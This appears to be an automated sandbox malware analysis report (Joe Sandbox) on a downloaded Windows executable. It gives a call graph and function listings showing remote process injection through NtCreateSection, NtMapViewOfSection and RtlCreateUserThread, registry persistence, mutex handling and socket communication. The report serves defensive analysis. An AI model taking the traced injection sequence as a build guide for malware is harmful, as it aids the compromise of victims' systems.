DestroyWindow 20142->20144 20143->20142 20144->20141 20145->20140 20147 310010 6 API calls 20146->20147 20148 3081d4 20147->20148 20149 308a74 20148->20149 20150 3081e4 LocalAlloc 20148->20150 20149->19841 20149->19842 20151 308a6a LocalFree 20150->20151 20152 3081fe LocalAlloc 20150->20152 20151->20149 20153 308a60 LocalFree 20152->20153 20154 308218 20152->20154 20153->20151 20155 30821e wnsprintfW wnsprintfW 20154->20155 20156 30825f 20154->20156 20157 308a3f LocalFree 20155->20157 20158 308265 wnsprintfW wnsprintfW 20156->20158 20159 3082a6 20156->20159 20157->20149 20158->20157 20160 3082ac wnsprintfW wnsprintfW 20159->20160 20161 3082ed 20159->20161 20160->20157 20162 3082f3 wnsprintfW wnsprintfW 20161->20162 20163 308334 20161->20163 20162->20157 20164 30833a wnsprintfW wnsprintfW 20163->20164 20165 30837b 20163->20165 20164->20157 20166 308381 wnsprintfW wnsprintfW 20165->20166 20167 3083c2 20165->20167 20166->20157 20168 3083c8 wnsprintfW wnsprintfW 20167->20168 20169 308409 20167->20169 20168->20157 20170 308450 20169->20170 20171 30840f wnsprintfW wnsprintfW 20169->20171 20172 308456 wnsprintfW wnsprintfW 20170->20172 20173 308497 20170->20173 20171->20157 20172->20157 20174 30849d wnsprintfW wnsprintfW 20173->20174 20175 3084de 20173->20175 20174->20157 20176 3084e4 wnsprintfW wnsprintfW 20175->20176 20177 308525 20175->20177 20176->20157 20225 31ebc0 LocalAlloc 20214->20225 20218 31e3a9 20219 31e2cd LoadLibraryA 20221 31e1f3 20219->20221 20224 31e1e7 20219->20224 20222 31e320 GetProcAddress 20222->20221 20222->20224 20223 31e356 GetProcAddress 20223->20221 20223->20224 20224->20218 20224->20219 20224->20221 20224->20222 20224->20223 20226 31ec1e 20225->20226 20227 31ec25 und_memcpy 20225->20227 20226->20224 20228 31ec4f VirtualAlloc 20227->20228 20229 31ec7d LocalFree 20228->20229 20231 31ec91 und_memcpy 20228->20231 20229->20226 20230 31ee5c LocalFree 20230->20226 20231->20230 20241 30ba36 WaitForSingleObject 20240->20241 20242 30ba52 SHGetKnownFolderPath 20241->20242 20253 30bb3f 20241->20253 20243 30bb65 20242->20243 20244 30ba6d LocalAlloc 20242->20244 20243->20241 20245 30ba87 20244->20245 20246 30bb5b CoTaskMemFree 20244->20246 20247 32359a __snwprintf 102 API calls 20245->20247 20246->20243 20248 30baa3 CreateFileW 20247->20248 20255 30bacf 20248->20255 20249 30baeb CloseHandle LocalFree CoTaskMemFree OpenEventW 20252 30bb2b SetEvent CloseHandle 20249->20252 20249->20253 20250 30bb51 LocalFree 20250->20246 20251 30bb47 CloseHandle 20251->20250 20252->20253 20254 30b6d0 127 API calls 20254->20255 20255->20249 20255->20250 20255->20251 20255->20254 20257 30f10d __write_nolock 20256->20257 20258 3179f0 5 API calls 20257->20258 20261 30f1a5 20257->20261 20258->20257 20259 317d60 5 API calls 20259->20261 20260 30f2ce WaitForSingleObject 20262 30f355 20260->20262 20263 30f2e7 GetLocalTime SystemTimeToFileTime 20260->20263 20261->20259 20264 30f2be 20261->20264 20265 30f9d8 OpenEventW 20262->20265 20268 30f384 wnsprintfW RegDeleteKeyExW 20262->20268 20263->20264 20264->20260 20264->20262 20266 30fa13 LocalFree 20265->20266 20267 30f9f9 SetEvent CloseHandle 20265->20267 20267->20266 20269 31f3b0 20268->20269 20270 30f3d0 wnsprintfW RegDeleteKeyExW 20269->20270 20271 31f3b0 20270->20271 20272 30f41c wnsprintfW RegDeleteKeyExW 20271->20272 20273 31f3b0 20272->20273 20274 30f468 wnsprintfW RegDeleteKeyExW 20273->20274 20275 312680 6 API calls 20274->20275 20276 30f4a8 20275->20276 20277 313160 115 API calls 20276->20277 20278 30f4ad 20277->20278 20317 321055 20316->20317 20318 321578 20316->20318 20319 321065 OpenMutexW 20317->20319 20320 32107a 20317->20320 20319->20320 20321 32155e 20320->20321 20322 3210a1 OpenMutexW 20320->20322 20323 32109d 20320->20323 20324 321564 CloseHandle 20321->20324 20325 32156e CloseHandle 20321->20325 20322->20321 20327 3210c0 WaitForSingleObject 20322->20327 20326 3210e2 CreateEventW 20323->20326 20328 321544 20323->20328 20324->20325 20325->20318 20326->20328 20336 321102 20326->20336 20327->20323 20327->20326 20328->20321 20329 32154a ReleaseMutex CloseHandle 20328->20329 20329->20321 20330 3214d1 WaitForSingleObject 20334 3214e4 SetEvent WaitForSingleObject 20330->20334 20335 3214fa 20330->20335 20331 321174 WaitForSingleObject 20331->20330 20333 321167 20331->20333 20332 321140 WaitForSingleObject 20332->20336 20337 32115b 20332->20337 20333->20330 20333->20331 20338 321197 WaitForSingleObject 20333->20338 20339 3211cc Sleep WaitForSingleObject 20333->20339 20348 3211c5 20333->20348 20349 3214ba WaitForSingleObject 20333->20349 20351 321253 setsockopt 20333->20351 20354 321463 CloseHandle 20333->20354 20355 32144d shutdown closesocket 20333->20355 20356 321436 CloseHandle 20333->20356 20358 3214ae ExitProcess 20333->20358 20360 32142c LocalFree 20333->20360 20401 321ea0 20333->20401 20334->20335 20340 321500 CloseHandle 20335->20340 20341 321511 20335->20341 20336->20332 20336->20333 20344 32152d CloseHandle 20337->20344 20338->20339 20345 3211ad WaitForSingleObject 20338->20345 20339->20333 20346 3211fd WaitForSingleObject 20339->20346 20340->20341 20342 321517 CloseHandle 20341->20342 20343 321528 20341->20343 20342->20343 20347 321db0 4 API calls 20343->20347 20344->20328 20345->20333 20345->20348 20346->20333 20347->20344 20348->20330 20349->20333 20351->20333 20352 321279 CreateEventW 20351->20352 20352->20333 20353 321294 LocalAlloc 20352->20353 20353->20356 20357 3212ab CreateThread 20353->20357 20354->20333 20355->20354 20356->20333 20357->20333 20359 3212d7 GetTickCount 20357->20359 20660 321580 20357->20660 20373 3212ea 20359->20373 20360->20356 20361 3213d1 shutdown closesocket SetEvent WaitForSingleObject 20418 321db0 20361->20418 20363 321300 WaitForSingleObject 20364 32131b WaitForSingleObject 20363->20364 20363->20373 20365 321335 WaitForSingleObject 20364->20365 20364->20373 20365->20373 20369 321375 WSAGetLastError 20372 321382 GetTickCount 20369->20372 20369->20373 20370 3213c1 Sleep 20370->20373 20371 32139e GetTickCount 20371->20373 20372->20373 20373->20361 20373->20363 20373->20364 20373->20369 20373->20370 20373->20371 20374 31f650 recv ___crtGetLocaleInfoEx 20373->20374 20374->20373 20376 31b672 CreateMutexW 20375->20376 20377 31b668 20375->20377 20376->20377 20378 31b696 CreateEventW 20376->20378 20379 31b924 LocalFree 20377->20379 20380 31b92e 20377->20380 20378->20377 20381 31b6bc 20378->20381 20379->20380 20382 31b937 CloseHandle 20380->20382 20383 31b94d 20380->20383 20384 31b6d0 WaitForSingleObject 20381->20384 20382->20383 20385 31b956 CloseHandle 20383->20385 20386 31b96d 20383->20386 20384->20377 20387 31b6e9 WaitForMultipleObjects WaitForSingleObject 20384->20387 20385->20386 20388 31b976 CloseHandle 20386->20388 20389 31b98d 20386->20389 20390 31b730 ReleaseMutex 20387->20390 20394 31b742 20387->20394 20388->20389 20390->20377 20391 31b779 ReleaseMutex WaitForMultipleObjects WaitForSingleObject 20391->20377 20391->20394 20392 31b76a ReleaseMutex 20392->20394 20393 32359a __snwprintf 102 API calls 20393->20394 20394->20377 20394->20391 20394->20392 20394->20393 20396 31b8f5 LocalFree Sleep 20394->20396 20397 31b859 WaitForMultipleObjects WaitForSingleObject 20394->20397 20811 319750 20394->20811 20837 31b9a0 LocalAlloc 20394->20837 20396->20384 20397->20394 20398 31b89e ReleaseMutex 20397->20398 20398->20377 20402 321f0e 20401->20402 20403 321eaf 20401->20403 20404 321f1b WaitForMultipleObjects WaitForSingleObject 20402->20404 20410 322013 20402->20410 20437 322030 lstrlenW 20403->20437 20406 321f54 ReleaseMutex 20404->20406 20408 321f68 20404->20408 20406->20410 20408->20410 20411 322005 ReleaseMutex 20408->20411 20412 321f8b lstrcpyA ReleaseMutex 20408->20412 20410->20333 20414 322003 SetEvent 20411->20414 20413 322030 225 API calls 20412->20413 20415 321fda 20413->20415 20414->20410 20415->20414 20417 321fe6 lstrcpyA 20415->20417 20417->20410 20477 322450 20437->20477 20440 3223e2 und_memcpy 20478 31f3b0 20477->20478 20479 322461 CoInitialize 20478->20479 20480 322474 CoCreateGuid 20479->20480 20481 322063 20479->20481 20482 322486 StringFromGUID2 20480->20482 20483 322524 CoUninitialize 20480->20483 20481->20440 20487 31fff0 socket 20481->20487 20482->20483 20483->20481 20686 3215b1 20660->20686 20661 3215f0 WaitForSingleObject 20662 321bd1 WaitForSingleObject 20661->20662 20661->20686 20662->20686 20663 3218c4 WaitForMultipleObjects 20668 32164b 20663->20668 20663->20686 20664 321638 WaitForSingleObject 20664->20668 20664->20686 20665 321d6b 20666 321ca0 shutdown closesocket 20666->20686 20667 321c2b shutdown closesocket 20667->20686 20668->20665 20669 321cff shutdown closesocket 20668->20669 20673 321d47 CloseHandle 20668->20673 20669->20668 20672 321c73 CloseHandle 20672->20686 20673->20668 20674 321672 WaitForSingleObject 20674->20686 20675 31fff0 62 API calls 20675->20686 20676 32194d WaitForSingleObject 20676->20668 20678 32196a WaitForSingleObject 20676->20678 20677 3216d3 setsockopt 20680 321713 setsockopt 20677->20680 20681 321894 shutdown closesocket 20677->20681 20678->20686 20680->20681 20680->20686 20681->20686 20683 3219c1 shutdown closesocket CloseHandle 20683->20686 20684 321a2f recv 20685 321b11 shutdown closesocket CloseHandle 20684->20685 20684->20686 20685->20686 20686->20661 20686->20662 20686->20663 20686->20664 20686->20666 20686->20667 20686->20668 20686->20672 20686->20674 20686->20675 20686->20676 20686->20677 20686->20681 20686->20683 20686->20684 20688 321a83 CloseHandle 20686->20688 20689 321ab5 shutdown closesocket CloseHandle 20686->20689 20690 320cd0 10 API calls 20686->20690 20691 320950 10 API calls 20686->20691 20692 321822 WSACreateEvent 20686->20692 20696 316d30 20686->20696 20688->20686 20689->20686 20690->20686 20691->20686 20692->20681 20693 321837 WSAEventSelect 20692->20693 20697 317072 20696->20697 20812 3197c9 20811->20812 20814 3197c2 20811->20814 20813 319806 LocalAlloc 20812->20813 20812->20814 20813->20814 20815 31981d CreateEventW 20813->20815 20814->20394 20816 319c9c LocalFree 20815->20816 20817 31983c LocalAlloc 20815->20817 20816->20814 20818 319c90 CloseHandle 20817->20818 20819 31985e LocalAlloc 20817->20819 20818->20816 20820 319c86 LocalFree 20819->20820 20822 319878 _memset 20819->20822 20820->20818 20821 319c7c LocalFree 20821->20820 20822->20821 20823 3199ec WaitForMultipleObjects 20822->20823 20827 319a7b 20822->20827 20823->20827 20827->20821 20838 31b8e1 ReleaseMutex 20837->20838 20839 31b9c2 _memmove 20837->20839 20838->20396 20840 31ba01 inet_addr 20839->20840 20841 31b9f0 LocalFree 20839->20841 20842 31bab1 20840->20842 20843 31ba23 gethostbyname 20840->20843 20841->20838 20846 32601a __wcstoi64 79 API calls 20842->20846 20844 31ba47 inet_ntoa 20843->20844 20845 31ba36 LocalFree 20843->20845 20847 31ba7b lstrcpyA 20844->20847 20848 31ba6d LocalFree 20844->20848 20845->20838 20849 31babe lstrcpyA LocalFree 20846->20849 20875 32601a 20847->20875 20848->20838 20849->20838 20876 326033 20875->20876 20899 305164 20898->20899 20900 30516e 7 API calls 20898->20900 20903 3056e3 20899->20903 20904 3056d6 LocalFree 20899->20904 20934 309da0 20900->20934 20902 3052df _memset 20907 3053bf 20902->20907 20913 305307 CryptBinaryToStringW CryptBinaryToStringW 20902->20913 20905 3056f8 20903->20905 20906 3056ec LocalFree 20903->20906 20904->20903 20908 305708 20905->20908 20909 3056fe CloseHandle 20905->20909 20906->20905 20907->20899 20941 305090 20907->20941 20910 305718 20908->20910 20911 30570e CloseHandle 20908->20911 20909->20908 20911->20910 20913->20907 20915 305352 _memset 20913->20915 20917 32359a __snwprintf 102 API calls 20915->20917 20916 3053ec LocalFree 20919 30539b lstrcpyW 20917->20919 20919->20907 20935 323520 _memset 20934->20935 20936 309dc5 GetSystemDirectoryW 20935->20936 20937 309dde GetVolumeInformationW 20936->20937 20939 309e2a 20936->20939 20938 309e16 20937->20938 20937->20939 21016 31bf00 CryptAcquireContextW 20938->21016 20939->20902 20942 3050b5 _memset 20941->20942 20943 32359a __snwprintf 102 API calls 20942->20943 20944 3050d3 RegCreateKeyExW 20943->20944 20945 30513a 20944->20945 20946 3050ff RegSetValueExW 20944->20946 20945->20899 20945->20916 20947 305130 RegCloseKey 20946->20947 20948 30511f RegCloseKey 20946->20948 20947->20945 20948->20945 21017 31bf3c CryptCreateHash 21016->21017 21018 31bfb1 21016->21018 21019 31c044 CryptReleaseContext 21017->21019 21030 31bf5c 21017->21030 21020 31c070 21018->21020 21021 31c064 CryptReleaseContext 21018->21021 21019->21018 21022 31c080 21020->21022 21023 31c076 CryptDestroyHash 21020->21023 21021->21020 21022->20939 21023->21022 21024 31bfec 21027 31bff2 CryptHashData 21024->21027 21028 31c00e CryptGetHashParam 21024->21028 21025 31bfbb CryptHashData 21025->21018 21025->21030 21026 31bf9e WaitForSingleObject 21026->21018 21026->21025 21027->21018 21027->21028 21028->21018 21029 31c033 CryptDestroyHash 21028->21029 21029->21019 21030->21024 21030->21025 21030->21026 21070 32359a __snwprintf 102 API calls 21069->21070 21071 304724 RegGetValueW 21070->21071 21072 3045d2 21071->21072 21072->19177 21073 304650 21072->21073 21074 304675 _memset 21073->21074 21075 32359a __snwprintf 102 API calls 21074->21075 21076 304693 RegCreateKeyExW 21075->21076 21077 3045e8 21076->21077 21078 3046bf RegSetValueExW 21076->21078 21077->19178 21077->19181 21079 3046de RegCloseKey 21078->21079 21080 3046ef RegCloseKey 21078->21080 21079->21077 21080->21077 21082 31ac9c PostMessageW 21081->21082 21083 31acae 21081->21083 21082->21083 21084 316d29 21083->21084 21085 31acb7 WaitForSingleObject CloseHandle 21083->21085 21084->18738 21084->18739 21085->21084 21087 32359a __snwprintf 102 API calls 21086->21087 21088 30b534 RegOpenKeyW 21087->21088 21089 30b551 21088->21089 21090 30b555 RegSetValueExW 21088->21090 21089->18911 21091 30b580 RegCloseKey 21090->21091 21092 30b572 RegCloseKey 21090->21092 21091->21089 21092->21089 21094 31430b 21093->21094 21095 31c59b GetFileSize 21093->21095 21094->18915 21094->18919 21096 31c5b0 LocalAlloc 21095->21096 21097 31c60a CloseHandle 21095->21097 21096->21097 21098 31c5c5 ReadFile 21096->21098 21097->21094 21099 31c5e1 21098->21099 21100 31c600 LocalFree 21098->21100 21099->21100 21101 31c5e9 CloseHandle 21099->21101 21100->21097 21101->21094 21141 30fcfc SHGetKnownFolderPath 21140->21141 21141->19037 21141->19038 17709 3058d5 17712 3058ef RtlCreateUserThread 17709->17712 17713 30592c 17712->17713

                                                                                                            Executed Functions

                                                                                                            Function 00301000 Relevance: 202.0, APIs: 100, Strings: 15, Instructions: 724COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00318110: LoadLibraryW.KERNEL32(NTDLL.DLL), ref: 0031811E
                                                                                                            • ExitProcess.KERNEL32 ref: 0030103F
                                                                                                            • _memset.LIBCMT ref: 0030105C
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00301072
                                                                                                            • ExitProcess.KERNEL32 ref: 0030107E
                                                                                                            Strings
                                                                                                            • {0F01F64A-5A5B-4CC4-B069-D85368F634DD}, xrefs: 0030149F
                                                                                                            • {DDA8C395-C285-4429-AF60-F1383F7E39E4}, xrefs: 003014B8
                                                                                                            • {8FE2C78C-5E69-438F-A4AB-0D2F0B3439E1}, xrefs: 003011B4, 003011EA
                                                                                                            • {DD700AA6-D197-4A4A-838A-B93EA96F236B}, xrefs: 00301117, 00301341, 00301368
                                                                                                            • {16875766-AD57-416F-8330-F0B6BCC3AFF1}, xrefs: 003010D1
                                                                                                            • {D3378A42-4880-48C8-9826-A27CECC41889}, xrefs: 003012D3
                                                                                                            • %s\svchost.exe, xrefs: 00301744
                                                                                                            • {FF4E2D7F-189B-498D-BED3-F1AA783F6E3F}, xrefs: 00301A5D
                                                                                                            • {7A93683D-6831-4ED6-AF6B-BEBF672AD8B7}, xrefs: 00301ADC
                                                                                                            • {7E105FD4-6112-4FB9-A722-91E984087449}, xrefs: 0030130E, 00301334
                                                                                                            • {A3956157-6EDC-4743-A7B9-FF7CDC2529A9}, xrefs: 003014D1
                                                                                                            • {8D32440A-6991-45E9-84BE-12C6B52AF58D}, xrefs: 00301149, 00301964
                                                                                                            • {6B55C48E-8FCD-482F-91CF-9C0B3FD8AC2B}, xrefs: 003019DF
                                                                                                            • %s\explorer.exe, xrefs: 00301703
                                                                                                            • %s\cmd.exe, xrefs: 00301788
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ExitProcess$FileLibraryLoadModuleName_memset
                                                                                                            • String ID: %s\cmd.exe$%s\explorer.exe$%s\svchost.exe${0F01F64A-5A5B-4CC4-B069-D85368F634DD}${16875766-AD57-416F-8330-F0B6BCC3AFF1}${6B55C48E-8FCD-482F-91CF-9C0B3FD8AC2B}${7A93683D-6831-4ED6-AF6B-BEBF672AD8B7}${7E105FD4-6112-4FB9-A722-91E984087449}${8D32440A-6991-45E9-84BE-12C6B52AF58D}${8FE2C78C-5E69-438F-A4AB-0D2F0B3439E1}${A3956157-6EDC-4743-A7B9-FF7CDC2529A9}${D3378A42-4880-48C8-9826-A27CECC41889}${DD700AA6-D197-4A4A-838A-B93EA96F236B}${DDA8C395-C285-4429-AF60-F1383F7E39E4}${FF4E2D7F-189B-498D-BED3-F1AA783F6E3F}
                                                                                                            • API String ID: 3630785697-1529498503
                                                                                                            • Opcode ID: 4b8f08dff92619335788efe2a3d966763562fbf4dd16112064c6bf736eedf7b3
                                                                                                            • Instruction ID: 164f6012a254188a58e58620fdb03f5d47675ec8427cee1478b6d24e2cbb3f34
                                                                                                            • Opcode Fuzzy Hash: 4b8f08dff92619335788efe2a3d966763562fbf4dd16112064c6bf736eedf7b3
                                                                                                            • Instruction Fuzzy Hash: 8E628170A51218DFEB379FA0EC99B9977B8BB48705F1050A8F60DAA1D1DBB45AC0CF11
                                                                                                            Function 003138D0 Relevance: 147.5, APIs: 66, Strings: 18, Instructions: 544nativestringprocessCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 241 3138d0-313993 GetCurrentProcess Wow64DisableWow64FsRedirection call 323520 lstrcpyW call 301c60 call 323520 CreateProcessW 248 314164-314171 Wow64DisableWow64FsRedirection 241->248 249 313999-313a1e NtCreateSection 241->249 250 314173-314176 248->250 251 313a24-313a73 GetCurrentProcess NtMapViewOfSection 249->251 252 31414a-31415e CloseHandle * 2 249->252 253 313a79-313abe NtMapViewOfSection 251->253 254 31413d-314144 NtClose 251->254 252->248 255 313ac4-313b19 NtCreateSection 253->255 256 31412c-314137 NtUnmapViewOfSection 253->256 254->252 257 314118-314126 NtUnmapViewOfSection 255->257 258 313b1f-313b70 GetCurrentProcess NtMapViewOfSection 255->258 256->254 257->256 259 313b76-313bbb NtMapViewOfSection 258->259 260 31410b-314112 NtClose 258->260 261 313bc1-313c0a NtCreateSection 259->261 262 3140fa-314105 NtUnmapViewOfSection 259->262 260->257 263 313c10-313c5e GetCurrentProcess NtMapViewOfSection 261->263 264 3140e6-3140f4 NtUnmapViewOfSection 261->264 262->260 265 313c64-313ca9 NtMapViewOfSection 263->265 266 3140d9-3140e0 NtClose 263->266 264->262 267 3140c8-3140d3 NtUnmapViewOfSection 265->267 268 313caf-313ed8 call 323ad0 call 31f4c0 call 323ad0 call 31f4c0 call 323ad0 lstrcpyW * 2 lstrcpyA * 11 call 323ad0 CreateEventW 265->268 266->264 267->266 281 3140b4-3140c2 NtUnmapViewOfSection 268->281 282 313ede-313f8e call 305720 GetModuleHandle64 GetProcAddress64 X64Call 268->282 281->267 285 313f94-313fc3 WaitForSingleObject ResetEvent 282->285 286 31409a-3140ae ResetEvent CloseHandle 282->286 285->286 287 313fc9-314095 NtUnmapViewOfSection * 6 NtClose * 3 CloseHandle Wow64DisableWow64FsRedirection 285->287 286->281 287->250
                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 003138D9
                                                                                                            • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 003138E9
                                                                                                            • _memset.LIBCMT ref: 00313906
                                                                                                            • lstrcpyW.KERNEL32(?,?), ref: 00313919
                                                                                                              • Part of subcall function 00301C60: _wcsrchr.LIBCMT ref: 00301C6C
                                                                                                            • _memset.LIBCMT ref: 00313940
                                                                                                            • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,?,00000044,?), ref: 0031398A
                                                                                                            • NtCreateSection.NTDLL(00000000,00000006,00000000,000005F0,00000004,08000000,00000000), ref: 00313A0B
                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,000005F0,00000002,00000000,00000004), ref: 00313A52
                                                                                                            • NtMapViewOfSection.NTDLL(00000000,00000000), ref: 00313A60
                                                                                                            • NtMapViewOfSection.NTDLL(00000000,?,00000000,00000000,00000000,00000000,000005F0,00000002,00000000,00000004), ref: 00313AAB
                                                                                                            • NtCreateSection.NTDLL(00000000,0000000E,00000000,?,00000040,08000000,00000000), ref: 00313B06
                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 00313B4F
                                                                                                            • NtMapViewOfSection.NTDLL(00000000,00000000), ref: 00313B5D
                                                                                                            • NtMapViewOfSection.NTDLL(00000000,?,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 00313BA8
                                                                                                            • NtCreateSection.NTDLL(00000000,00000006,00000000,?,00000004,08000000,00000000), ref: 00313BF7
                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000004), ref: 00313C3D
                                                                                                            • NtMapViewOfSection.NTDLL(00000000,00000000), ref: 00313C4B
                                                                                                            • NtMapViewOfSection.NTDLL(00000000,?,00000000,00000000,00000000,00000000,?,00000002,00000000,00000004), ref: 00313C96
                                                                                                            • _memmove.LIBCMT ref: 00313CBE
                                                                                                            • _memmove.LIBCMT ref: 00313CF7
                                                                                                            • _memmove.LIBCMT ref: 00313D30
                                                                                                            • lstrcpyW.KERNEL32(?,KERNEL32.DLL), ref: 00313D50
                                                                                                            • lstrcpyW.KERNEL32(?,USER32.DLL), ref: 00313D68
                                                                                                            • lstrcpyA.KERNEL32(?,LoadLibraryW), ref: 00313D80
                                                                                                            • lstrcpyA.KERNEL32(?,GetProcAddress), ref: 00313D97
                                                                                                            • lstrcpyA.KERNEL32(?,Sleep), ref: 00313DAF
                                                                                                            • lstrcpyA.KERNEL32(?,LoadLibraryA), ref: 00313DC7
                                                                                                            • lstrcpyA.KERNEL32(?,LocalAlloc), ref: 00313DDE
                                                                                                            • lstrcpyA.KERNEL32(?,VirtualAlloc), ref: 00313DF6
                                                                                                            • lstrcpyA.KERNEL32(?,LocalFree), ref: 00313E0E
                                                                                                            • lstrcpyA.KERNEL32(?,CloseHandle), ref: 00313E25
                                                                                                            • lstrcpyA.KERNEL32(?,VirtualFree), ref: 00313E3D
                                                                                                            • lstrcpyA.KERNEL32(?,MessageBoxW), ref: 00313E55
                                                                                                            • lstrcpyA.KERNEL32(?,VirtualProtect), ref: 00313E6C
                                                                                                            • _memmove.LIBCMT ref: 00313EA9
                                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,?), ref: 00313EC5
                                                                                                            • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 003140C2
                                                                                                              • Part of subcall function 00305720: GetCurrentProcess.KERNEL32(0037CB2C,?,00313EE3), ref: 00305728
                                                                                                              • Part of subcall function 00305720: IsWow64Process.KERNEL32(00000000,?,00313EE3), ref: 0030572F
                                                                                                              • Part of subcall function 00305720: GetProcessHeap.KERNEL32(?,00313EE3), ref: 00305735
                                                                                                            • GetModuleHandle64.DOWNLOADED_FILE(NTDLL.DLL), ref: 00313EE8
                                                                                                            • GetProcAddress64.DOWNLOADED_FILE(?,?,RtlCreateUserThread), ref: 00313F0F
                                                                                                            • X64Call.DOWNLOADED_FILE(?,?,0000000A,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00313F79
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00001388), ref: 00313FA0
                                                                                                            • ResetEvent.KERNEL32(00000000), ref: 00313FB3
                                                                                                            • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 00313FD7
                                                                                                            • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 00313FEB
                                                                                                            • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 00313FFF
                                                                                                            • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 00314010
                                                                                                            • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 00314021
                                                                                                            • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 00314032
                                                                                                            • NtClose.NTDLL(00000000), ref: 0031403F
                                                                                                            • NtClose.NTDLL(00000000), ref: 0031404C
                                                                                                            • NtClose.NTDLL(00000000), ref: 00314059
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00314066
                                                                                                            • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 00314073
                                                                                                            • ResetEvent.KERNEL32(00000000), ref: 003140A1
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 003140AE
                                                                                                            • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 003140D3
                                                                                                            • NtClose.NTDLL(00000000), ref: 003140E0
                                                                                                            • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 003140F4
                                                                                                            • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 00314105
                                                                                                            • NtClose.NTDLL(00000000), ref: 00314112
                                                                                                            • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 00314126
                                                                                                            • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 00314137
                                                                                                            • NtClose.NTDLL(00000000), ref: 00314144
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00314151
                                                                                                            • CloseHandle.KERNEL32(?), ref: 0031415E
                                                                                                            • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 0031416B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Section$View$lstrcpy$Unmap$Close$Process$Wow64$CreateCurrent$Handle_memmove$DisableEventRedirection$Reset_memset$Address64CallHandle64HeapModuleObjectProcSingleWait_wcsrchr
                                                                                                            • String ID: 777367648777262762$897878765347627341$CloseHandle$D$GetProcAddress$KERNEL32.DLL$LoadLibraryA$LoadLibraryW$LocalAlloc$LocalFree$MessageBoxW$NTDLL.DLL$RtlCreateUserThread$Sleep$USER32.DLL$VirtualAlloc$VirtualFree$VirtualProtect
                                                                                                            • API String ID: 456155699-117320160
                                                                                                            • Opcode ID: 778d0c2f63ec5a978ad47edb1216f1f1c4a6eee0e51fcb9a5b04390283969c11
                                                                                                            • Instruction ID: f50091ab440c20804cf0d656af9524036d8fe08315a7399b94b2540c7b0e7294
